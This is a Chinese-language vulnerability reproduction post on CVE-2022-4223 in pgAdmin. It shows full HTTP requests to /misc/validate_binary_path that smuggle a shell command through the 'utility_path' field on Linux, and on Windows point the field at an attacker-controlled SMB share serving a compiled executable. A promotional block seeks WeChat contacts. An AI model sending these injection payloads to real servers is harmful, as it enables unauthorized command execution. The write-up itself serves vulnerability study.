pgAdmin未授權命令執行漏洞（CVE-2022-4223）

​

https://ftp.postgresql.org/pub/pgadmin/pgadmin4/v5.7/source/pgadmin4-5.7.tar.gz 下載 pgadmin5.7 的原始碼

首先從程式碼層面進行分析

介面 /validate_binary_path​ 最後呼叫了 subprocess.getoutput(​來執行了命令

這一部分程式碼是對傳入的路徑進行檢測，如果是在 linux 下直接拼接，在windows 下部署，字尾中會新增 .exe​ 。同時 windows下惡意的exe檔案必須是下面幾個檔名之一 'pg_dump', 'pg_dumpall', 'pg_restore', 'psql'

linux

可以從 docker hub 上搜尋 docker 資源 https://hub.docker.com/search?q=pgadmin

docker pull dpage/pgadmin4:6.16
docker run -e 'PGADMIN_DEFAULT_EMAIL=test@example.com' -e 'PGADMIN_DEFAULT_PASSWORD=123456'  -p 5050:80 --name pgadmin -d  docker.io/dpage/pgadmin4:6.16

直接構造傳送會提示 The CSRF token is missing.​

所以我們先請求路由 login

POST /misc/validate_binary_path HTTP/1.1
Host: 127.0.0.1:5050
Upgrade-Insecure-Requests: 1
X-pgA-CSRFToken:ImI1OWE1NjQ3ZDZlYjBkYzFmMjgzYzE3MTEyMGRiZTA0MWYwM2YwMjgi.ZhUBBQ.S3V3X0JmCbEcwcpWZkf1TVYVRS4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PGADMIN_LANGUAGE=en;pga4_session=bada494b-009f-4c04-bded-20497c5dcf74!pMVxVlI925/AqyV9Oq0RqiPecdo0fWg2hWYHxGDEpYc=;
Connection: close
Content-Type: application/json
Content-Length: 33
​
{"utility_path":"a\";ifconfig;#"}

import os
binary_path = "a\";ifconfig;#"
UTILITIES_ARRAY = ['pg_dump', 'pg_dumpall', 'pg_restore', 'psql']
for utility in UTILITIES_ARRAY:
    full_path = os.path.abspath(
        os.path.join(binary_path, (utility if os.name != 'nt' else (utility + '.exe')))
    )
    print(full_path)
​

我們簡化程式碼在linux 下執行，最後利用;​ 分割執行命令

【----幫助網安學習，以下所有學習資料免費領！加vx：dctintin，備註 “部落格園” 獲取！】

　① 網安學習成長路徑思維導圖
　② 60+網安經典常用工具包
　③ 100+SRC漏洞分析報告
　④ 150+網安攻防實戰技術電子書
　⑤ 最權威CISSP 認證考試指南+題庫
　⑥ 超1800頁CTF實戰技巧手冊
　⑦ 最新網安大廠面試題合集（含答案）
　⑧ APP客戶端安全檢測指南（安卓+IOS）

windows

下載軟體並進行安裝 https://ftp.postgresql.org/pub/pgadmin/pgadmin4/v5.7/windows/pgadmin4-5.7-x64.exe

我們發現同樣在 windows 下拼接時是無法利用;​ 分割執行命令，但是可以透過 UNC path指定攻擊者的惡意檔案

import os
binary_path = "\\\\192.168.222.1\\TMP\\"
UTILITIES_ARRAY = ['pg_dump', 'pg_dumpall', 'pg_restore', 'psql']
for utility in UTILITIES_ARRAY:
    full_path = os.path.abspath(
        os.path.join(binary_path, (utility if os.name != 'nt' else (utility + '.exe')))
    )
    print(full_path)

我們發現透過構造傳入引數，我們可以偽造共享地址

windows 下的環境始終無法啟動 web 介面，因為環境實在太老了，啟動 C:\Users\username\AppData\Local\Programs\pgAdmin 4\v5\web\setup.py 各種版本問題，一直沒辦法啟動成功，所以只做理論上的驗證

後來我發現安裝完成之後，會在介面下提供一個python目錄，所以直接選擇該python 來啟動專案，需要把C:\Users\username\AppData\Local\Programs\pgAdmin 4\v5\web 下的config.py 修改 DEFAULT_SERVER \= '0.0.0.0'

使用impacket提供的smbserver.py指令碼構造惡意的smb服務 smbserver.py TMP /tmp

編譯惡意的exe檔案並放到對應目錄

• pip install pyinstaller

• type execute_calc.py

  import subprocess
  ​
  def execute_calc():
      subprocess.call("calc.exe")
  ​
  if __name__ == "__main__":
      execute_calc()

• pyinstaller --onefile execute_calc.py

POST /misc/validate_binary_path HTTP/1.1
Host: 192.168.222.145:5050
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-pgA-CSRFToken: Ijg5MDJjOGQ2YmVlNTA1NDMwZjFmODA1ZWNjYTIyNzg5MjExM2EzNDci.Zi3CIg.9u2mEcj30C2tPX0soO3L7tJrp5w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: pga4_session=9cd07409-7aca-46c3-8635-e615a7fcd4ac!lthUHprxGzxRdWMWfPm1VLDOLpk=; 
Connection: close
Content-Type: application/json
Content-Length: 45
​
{"utility_path":"\\\\192.168.222.128\\TMP\\"}

更多網安技能的線上實操練習，請點選這裡>>